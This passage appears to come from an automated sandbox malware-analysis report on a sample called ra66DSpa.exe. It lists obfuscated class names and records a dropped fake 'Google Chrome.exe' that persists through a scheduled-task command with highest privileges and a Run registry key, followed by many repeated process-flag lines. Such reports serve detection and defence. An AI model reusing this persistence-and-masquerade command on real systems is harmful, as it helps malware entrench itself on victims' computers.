            Source: Google Chrome.exe.0.dr, J98X1BFg5gJL3LEHshTwd7ce57sCLsSpHnQqNrNz84Npmlezw2ixv8EEP5lxKEpatP2fuOektELGGi3GtcfrtkZaIfjYLk.cs High entropy of concatenated method names: 'wZBM5ojQGg2RjahBa0WkrFlLdUlrceKHzCh8k7cn9VhFqGSrOpBb52KtHrihcqLeWB9gTNfWkLbuXDDcZq8qqsINfEOno2', 'wt8jkByqmQcTZ14EKz0D1CJHwfO6sWgoMjwYgBl9X6qFtey5tYJD9hWYzD2etV50MzK8gYiiLOFX7hP97LPWmfBdUvcBVV', '_1Yvd7EP7SB6xtR2aA4XS3q6pEV9psxrWoS51QDeTtLjnW6csAzoFchtQZ0Hy3QALOkJtI85STN8Ikrd8Eg8oRb0GpDudYX', '_2gBhZ5BoLgO7u9tA5Bs1kbvrp5UPsdypzngGLrlO1dQRDxCFsXPJSaa0xACeedejo8MU60z6sAvHris7MZEbzyNfW6IIIu', 'qfgQB4qqEeK9tpNoSXUPndeHk4lXo16H6Knuuy70v9O123Xq3FKSyrgr6f9XnBpU52MMjRwAEDm7DbOWKOfLPxoZ7dYZXF', 'YTM9aN9h740QuL85XhcEiyOeKSEiwEpfDqbftaEUZgdWHI8mB8I28TszOAfkBOwpSDTANckW5pso3Un1inNHIJS9zV4JKl', 'Gxd5xXvz2rvgslCHArV2lXa8jegIsnWSOkAajwjt5VdyIr3I622JavRq7K1Dw27ATUa01rDFh4EAMEFjpccLELbCcEZ7IQ', 'hb6xelOkw13KbjQ9m71WiKLtmvsmR1ST5Bl6Ej1tzVynu5mszrwrNKehECVG6UVK9i48wAvCWoQekcL4wiiXNqT4nxmUPD', 'gpLJRiK9Rfsna9Ipj6kjn3mIDnNYGHmEoNuuhxKpzLY6kiWroTybdagMIZIOpWGqJc8lrFSsqkOndqyPFc9paKtPjYY3n2', 'ZFlK2bqHQgKtiWRVpSD9tlolsspNausjEn9BpNuEIennHCiWaeKnnwHUBz1k96JO7nBXRyKync4TXdGdPYENLFVVOjIcIh'
            Source: Google Chrome.exe.0.dr, cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.cs High entropy of concatenated method names: '_1SeOnvg2opDAPsTRUItiyarIPhcivQDw58fw5sIDXHH9hkbVNR6tBJbyrzqoF15r6s39DnPDvVYRZsE', 'GI7actamk5DaZIvBTBSGE6BKt4OMXEURZS1ihUyGCFpREbHt0XLcZKvxYeZj8A28nOsX0h4VUDimPIK', 'fBM7Vf76rL4NxUgLIUcHalZYOfyKuhj7SKCuOpOX0LPwgK3aM7cj4PvORUYAgcubV2jlJefyugaKcv6', 'Q4zTAi9G7jn5vyBK1cmEpk54abk9d2RPMamwhJ5B56XXKAz9xzbuwMKfKW8nUCF1UCYekUp1MzGIDUQ', '_2S8DHJAELWwXKGLXTElV2YhAAWpEnVzn4sj2lK7SSGXtzKKSlQ8eGTAzcBstZbcuY2eMXPCzxx0wQzg', 'vY1LbThbKHuRexLVDjmWCWr8e1Qfxka04LEvgGDhxAxf3rCtUcyYufCk1UQo0fJt6XG1EgX36hTPIdy', 'uOcpFnXWyqtLDFG6xHuQpl4OoKNJNCfSbiJcp7QEcpziaOu32vif4yOca4QiiaGqKgpRuv4DKmi8ZZl', 'A2kpZzLKth0vkyLZawo5qtIB5n0tIE5aZF1YKk4zNcMSYk617daNSvAVNpLIQTC1mLwbNibhrE1x9ug', '_8S4mWXblVKfCSFlBSfxIAkBmCKQ1VhdFzZeS02W1YWpVNxNuKvmsMwHfRMW96JvkG8QVHcNDKiDqFFC', 'htUAjReymaUvK5qkAX1YQxbzo6VvIEqHBKL4iaZPZf9ZzLo8ulBehcqNuervWpzgeNTm0cvvxACqVMA'
            Source: Google Chrome.exe.0.dr, EIPsVow9UCeNztykmrhINOiUil0Z52Gi3H9Gbg0oawiqwjz7kGFYijU1XPu2hAqcmAN7jbnGDMeOWHQpPyjCppdxYWrLcF.cs High entropy of concatenated method names: '_1gfP3s9GmHdjwlxEFWeY7B9aoMNhEANDttTs2tpukKTu4MjJ8sIfETZxRkx1cj62b5Zjnl3GNQDADAiFjNQ9i8EfzMt8lF', '_65xDJzJGgKfGCfbaH8yFcgC9A2PbWh2edZTyiL1v26AyyxvYn685JSiqC7zPYTTQyoMF5otVfxaHtcu', 'bWW5eN9JpyUHVz07OGzHwM2Or9LlpbZXL2gRKfw5Rt9fG2xetFYi4lTqR7JrrQj8u1KIvLz4Tw8ece0', '_7FfoN83I62Qozf5uY6VK5UeISxgSpAQ7bEMgJ317skvbSBxmSnKuqax2XrKwlrRe6QCzyWClxOuW7i7', 'MIzCUJYNn4A5EKsGfaX5PMX1VXDXi9sNMMnCfxq', 'KXJ26WZ2qeMh1dR1og13OPzfRT93uDQDQ3qMB4U', 'iDO0UXmoXeLZce2DSGeFDXveCA9Xh83hKE1uKy4', 'AXx7UD5abpOMxLIMV26D9q45tPPe1CjgXdtS4h5', 'PlcfdaIeVxYZf2VJSRplvYjIE0izEPRoPGHqJ9U', '_6Vpjln0moI6OAarOC7UbjdR3P99tk8UuRThgwH5'
            Source: Google Chrome.exe.0.dr, khpJTONaip9rT88b3VfF2YRz7tYSJsVeufU9NBWttPrjMfB7GOKq1mB11RyuI1.cs High entropy of concatenated method names: 'QN0cTZO60jBqUSOguU6PP3nr0BE9aMV62uvv5wDmbnw2RuMSW98lV9SiTZkF0BQoOp57Tl5Rzll0nnPnYGuDB9v9jpHGb6', 'itYLttotGEqSiKH8z86Oy96Fw8WrbsMDhw1WvDu', 'PUhk1m505bp6HQgHvUorAUwpL5IiXbxWcYveDkr', 'NGBjajTaeK0vlsZi9iSxRBTvZ2g9cSVsCKlW4QJ', 'DJm0WGqaQjKD7TXVer9qVnM0gotGEE06VyYzWCa'
            Source: C:\Users\user\Desktop\ra66DSpa.exe File created: C:\Users\user\AppData\Local\Google Chrome.exe

            Boot Survival

            Source: C:\Users\user\Desktop\ra66DSpa.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe"
            Source: C:\Users\user\Desktop\ra66DSpa.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Google Chrome

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\ra66DSpa.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
